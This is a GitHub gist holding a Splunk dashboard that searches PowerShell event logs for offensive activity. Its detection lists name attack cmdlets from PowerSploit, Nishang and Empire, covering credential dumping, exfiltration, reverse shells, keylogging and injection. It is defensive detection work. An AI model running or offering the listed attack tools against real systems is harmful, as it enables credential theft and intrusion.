Skip to content

Instantly share code, notes, and snippets.

@trevorbryant

trevorbryant/Windows Event Collection - Offensive PowerShell

Created November 14, 2018 15:46
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save trevorbryant/125c593823d4d47325ce4463766f3492 to your computer and use it in GitHub Desktop.
Save trevorbryant/125c593823d4d47325ce4463766f3492 to your computer and use it in GitHub Desktop.
Download ZIP
Splunk dashboard for Windows Event Collection - Offensive PowerShell
Raw
Windows Event Collection - Offensive PowerShell
<form>
<label>Windows Event Collection - Offensive PowerShell</label>
<description>Detect Offensive PowerShell Attacks. Not every result is offensive; requires verification</description>
<fieldset submitButton="false" autoRun="true">
<input type="time" token="time" searchWhenChanged="true">
<label>Time Range</label>
<default>
<earliest>-24h@h</earliest>
<latest>now</latest>
</default>
</input>
</fieldset>
<row>
<panel>
<title>Encoded Commands</title>
<table>
<search>
<query>index=windows LogName=*PowerShell* (TERM(*powershell*) TERM(*-enc*))
| rex field=_raw "HostApplication="(?&lt;op_hostapplication&gt;\w.+)""
| search NOT (op_hostapplication="C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe -Embedding")
| stats values(ComputerName) as computer, values(ParameterBinding_Out_Default_) as out_text, values(op_user) as user, count(op_hostapplication) as count by op_hostapplication
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
<sampleRatio>1</sampleRatio>
</search>
</table>
</panel>
</row>
<row>
<panel>
<title>PowerSploit</title>
<table>
<title>https://github.com/PowerShellMafia/PowerSploit</title>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(Add-NetUser)
OR TERM(Add-ObjectAcl)
OR TERM(Add-Persistence)
OR TERM(Add-ServiceDacl)
OR TERM(Convert-NameToSid)
OR TERM(Convert-NT4toCanonical)
OR TERM(Convert-SidToName)
OR TERM(Copy-ClonedFile)
OR TERM(Find-AVSignature)
OR TERM(Find-ComputerField)
OR TERM(Find-ForeignGroup)
OR TERM(Find-ForeignUser)
OR TERM(Find-GPOComputerAdmin)
OR TERM(Find-GPOLocation)
OR TERM(Find-InterestingFile)
OR TERM(Find-LocalAdminAccess)
OR TERM(Find-PathDLLHijack)
OR TERM(Find-ProcessDLLHijack)
OR TERM(Find-ManagedSecurityGroups)
OR TERM(Find-UserField)
OR TERM(Get-ADObject)
OR TERM(Get-ApplicationHost)
OR TERM(Get-CachedRDPConnection)
OR TERM(Get-ComputerDetails)
OR TERM(Get-ComputerProperty)
OR TERM(Get-CurrentUserTokenGroupSid)
OR TERM(Get-DFSshare)
OR TERM(Get-DomainPolicy)
OR TERM(Get-ExploitableSystem)
OR TERM(Get-GPPPassword)
OR TERM(Get-HttpStatus)
OR TERM(Get-Keystrokes)
OR TERM(Get-LastLoggedOn)
OR TERM(Get-ModifiablePath)
OR TERM(Get-ModifiableRegistryAutoRun)
OR TERM(Get-ModifiableScheduledTaskFile)
OR TERM(Get-ModifiableService)
OR TERM(Get-ModifiableServiceFile)
OR TERM(Get-NetComputer)
OR TERM(Get-NetDomain)
OR TERM(Get-NetDomainController)
OR TERM(Get-NetDomainTrust)
OR TERM(Get-NetFileServer)
OR TERM(Get-NetForest)
OR TERM(Get-NetForestCatalog)
OR TERM(Get-NetForestDomain)
OR TERM(Get-NetForestTrust)
OR TERM(Get-NetGPO)
OR TERM(Get-NetGPOGroup)
OR TERM(Get-NetGroup)
OR TERM(Get-NetGroupMember)
OR TERM(Get-NetLocalGroup)
OR TERM(Get-NetLoggedon)
OR TERM(Get-NetOU)
OR TERM(Get-NetProcess)
OR TERM(Get-NetRDPSession)
OR TERM(Get-NetSession)
OR TERM(Get-NetShare)
OR TERM(Get-NetSite)
OR TERM(Get-NetSubnet)
OR TERM(Get-NetUser)
OR TERM(Get-ObjectAcl)
OR TERM(Get-PathAcl)
OR TERM(Get-Proxy)
OR TERM(Get-RegistryAlwaysInstallElevated)
OR TERM(Get-RegistryAutoLogon)
OR TERM(Get-SecurityPackages)
OR TERM(Get-ServiceDetail)
OR TERM(Get-ServiceUnquoted)
OR TERM(Get-SiteListPassword)
OR TERM(Get-System)
OR TERM(Get-TimedScreenshot)
OR TERM(Get-UnattendedInstallFile)
OR TERM(Get-UserEvent)
OR TERM(Get-UserProperty)
OR TERM(Get-VaultCredential)
OR TERM(Get-VolumeShadowCopy)
OR TERM(Get-Webconfig)
OR TERM(Install-ServiceBinary)
OR TERM(Install-SSP)
OR TERM(Invoke-ACLScanner)
OR TERM(Invoke-AllChecks)
OR TERM(Invoke-CheckLocalAdminAccess)
OR TERM(Invoke-CredentialInjection)
OR TERM(Invoke-DllInjection)
OR TERM(Invoke-EnumerateLocalAdmin)
OR TERM(Invoke-EventHunter)
OR TERM(Invoke-FileFinder)
OR TERM(Invoke-MapDomainTrust)
OR TERM(Invoke-Mimikatz)
OR TERM(Invoke-NinjaCopy)
OR TERM(Invoke-Portscan)
OR TERM(Invoke-ProcessHunter)
OR TERM(Invoke-ReflectivePEInjection)
OR TERM(Invoke-ReverseDnsLookup)
OR TERM(Invoke-ServiceAbuse)
OR TERM(Invoke-ShareFinder)
OR TERM(Invoke-Shellcode)
OR TERM(Invoke-TokenManipulation)
OR TERM(Invoke-UserHunter)
OR TERM(Invoke-WmiCommand)
OR TERM(Mount-VolumeShadowCopy)
OR TERM(New-ElevatedPersistenceOption)
OR TERM(New-UserPersistenceOption)
OR TERM(New-VolumeShadowCopy)
OR TERM(Out-CompressedDll)
OR TERM(Out-EncodedCommand)
OR TERM(Out-EncryptedScript)
OR TERM(Out-Minidump)
OR TERM(Remove-Comments)
OR TERM(Remove-VolumeShadowCopy)
OR TERM(Restore-ServiceBinary)
OR TERM(Set-ADObject)
OR TERM(Set-CriticalProcess)
OR TERM(Set-MacAttribute)
OR TERM(Set-MasterBootRecord)
OR TERM(Set-ServiceBinPath)
OR TERM(Test-ServiceDaclPermission)
OR TERM(Write-HijackDll)
OR TERM(Write-ServiceBinary)
OR TERM(Write-UserAddMSI))
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
<sampleRatio>1</sampleRatio>
</search>
</table>
</panel>
<panel>
<title>PowerView</title>
<table>
<title>https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1</title>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(Get-NetUser)
OR TERM(Get-NetGroup)
OR TERM(Get-NetGroupMember)
OR TERM(Get-NetLocalGroup)
OR TERM(Get-NetSession)
OR TERM(Invoke-UserHunter)
OR TERM(Get-NetOU)
OR TERM(Find-GPOLocation)
OR TERM(Get-NetGPOGroup)
OR TERM(Get-ObjectACL)
OR TERM(Add-ObjectACL)
OR TERM(Invoke-ACLScanner)
OR TERM(Set-ADObject)
OR TERM(Invoke-DowngradeAccount)
OR TERM(Get-NetForest)
OR TERM(Get-NetForestTrust)
OR TERM(Get-NetForestDomain)
OR TERM(Get-NetDomainTrust)
OR TERM(Get-MapDomainTrust))
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
<sampleRatio>1</sampleRatio>
</search>
</table>
</panel>
</row>
<row>
<panel>
<title>PowerUp</title>
<table>
<title>https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1</title>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(Get-ServiceUnquoted)
OR TERM(Get-ServiceFilePermission)
OR TERM(Get-ServicePermission)
OR TERM(Invoke-ServiceAbuse)
OR TERM(Install-ServiceBinary)
OR TERM(Get-RegAutoLogon)
OR TERM(Get-VulnAutoRun)
OR TERM(Get-VulnSchTask)
OR TERM(Get-UnattendedInstallFile)
OR TERM(Get-WebConfig)
OR TERM(Get-ApplicationHost)
OR TERM(Get-RegAlwaysInstallElevated))
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
</search>
<option name="drilldown">none</option>
</table>
</panel>
<panel>
<title>Nishang</title>
<table>
<title>https://github.com/samratashok/nishang</title>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(Get-Unconstrained)
OR TERM(Add-RegBackdoor)
OR TERM(Add-ScrnSaveBackdoor)
OR TERM(Gupt-Backdoor)
OR TERM(Invoke-ADSBackdoor)
OR TERM(Enabled-DuplicateToken)
OR TERM(Invoke-PsUaCme)
OR TERM(Remove-Update)
OR TERM(Check-VM)
OR TERM(Copy-VSS)
OR TERM(Get-Information)
OR TERM(Get-LSASecret)
OR TERM(Get-PassHashes)
OR TERM(Invoke-Mimikatz)
OR TERM(Show-TargetScreen)
OR TERM(Port-Scan)
OR TERM(Invoke-PoshRatHttp)
OR TERM(Invoke-PowerShellTCP)
OR TERM(Invoke-PowerShellWMI)
OR TERM(Add-Exfiltration)
OR TERM(Add-Persistence)
OR TERM(Do-Exfiltration)
OR TERM(Start-CaptureServer))
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
</search>
<option name="drilldown">none</option>
</table>
</panel>
</row>
<row>
<panel>
<title>PowerShell Empire</title>
<table>
<title>https://github.com/EmpireProject/Empire</title>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(Invoke-DllInjection)
OR TERM(Invoke-ReflectivePEInjection)
OR TERM(Invoke-ShellCode)
OR TERM(Get-ChromeDump)
OR TERM(Get-ClipboardContents)
OR TERM(Get-FoxDump)
OR TERM(Get-IndexedItem)
OR TERM(Get-Keystrokes)
OR TERM(Get-Screenshot)
OR TERM(Invoke-Inveigh)
OR TERM(Invoke-NetRipper)
OR TERM(Invoke-NinjaCopy)
OR TERM(Out-Minidump)
OR TERM(Invoke-EgressCheck)
OR TERM(Invoke-PostExfil)
OR TERM(Invoke-PSInject)
OR TERM(Invoke-RunAs)
OR TERM(MailRaider)
OR TERM(New-HoneyHash)
OR TERM(Set-MacAttribute)
OR TERM(Get-VaultCredential)
OR TERM(Invoke-DCSync)
OR TERM(Invoke-Mimikatz)
OR TERM(Invoke-PowerDump)
OR TERM(Invoke-TokenManipulation)
OR TERM(Exploit-Jboss)
OR TERM(Invoke-ThunderStruck)
OR TERM(Invoke-VoiceTroll)
OR TERM(Set-Wallpaper)
OR TERM(Invoke-InveighRelay)
OR TERM(Invoke-PsExec)
OR TERM(Invoke-SSHCommand)
OR TERM(Get-SecurityPackages)
OR TERM(Install-SSP)
OR TERM(Invoke-BackdoorLNK)
OR TERM(PowerBreach)
OR TERM(Get-GPPPassword)
OR TERM(Get-SiteListPassword)
OR TERM(Get-System)
OR TERM(Invoke-BypassUAC)
OR TERM(Invoke-Tater)
OR TERM(Invoke-WScriptBypassUAC)
OR TERM(PowerUp)
OR TERM(PowerView)
OR TERM(Get-RickAstley)
OR TERM(Find-Fruit)
OR TERM(HTTP-Login)
OR TERM(Find-TrustedDocuments)
OR TERM(Get-ComputerDetails)
OR TERM(Get-SystemDNSServer)
OR TERM(Invoke-Paranoia)
OR TERM(Invoke-WinEnum)
OR TERM(Get-SPN)
OR TERM(Invoke-ARPScan)
OR TERM(Invoke-PortScan)
OR TERM(Invoke-ReverseDNSLookup)
OR TERM(Invoke-SMBScanner))
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
</search>
<option name="drilldown">none</option>
</table>
</panel>
<panel>
<title>Libraries or Access Rights</title>
<table>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(AdjustTokenPrivileges)
OR TERM(IMAGE_NT_OPTIONAL_HDR64_MAGIC)
OR TERM(Management.Automation.RuntimeException)
OR TERM(Microsoft.Win32.UnsafeNativeMethods)
OR TERM(ReadProcessMemory.Invoke)
OR TERM(Runtime.InteropServices)
OR TERM(SE_PRIVILEGE_ENABLED)
OR TERM(System.Security.Cryptography)
OR TERM(System.Reflection.AssemblyName)
OR TERM(System.Runtime.InteropServices)
OR TERM(LSA_UNICODE_STRING)
OR TERM(MiniDumpWriteDump)
OR TERM(PAGE_EXECUTE_READ)
OR TERM(Net.Sockets.SocketFlags)
OR TERM(Reflection.Assembly)
OR TERM(SECURITY_DELEGATION)
OR TERM(TOKEN_ADJUST_PRIVILEGES)
OR TERM(TOKEN_ALL_ACCESS)
OR TERM(TOKEN_ASSIGN_PRIMARY)
OR TERM(TOKEN_DUPLICATE)
OR TERM(TOKEN_ELEVATION)
OR TERM(TOKEN_IMPERSONATE)
OR TERM(TOKEN_INFORMATION_CLASS)
OR TERM(TOKEN_PRIVILEGES)
OR TERM(TOKEN_QUERY)
OR TERM(Metasploit)
OR TERM(Advapi32.dll)
OR TERM(kernel32.dll)
OR TERM(msvcrt.dll)
OR TERM(ntdll.dll)
OR TERM(secur32.dll)
OR TERM(user32.dll))
| rex field=_raw "ScriptName="(?&lt;op_scriptname&gt;\w.+)""
| search NOT (op_scriptname=""
OR Path="C:\\WINDOWS\\CCM\\SystemTemp\\*-*-*-*-*.ps1")
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
</search>
<option name="drilldown">cell</option>
</table>
</panel>
</row>
</form>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment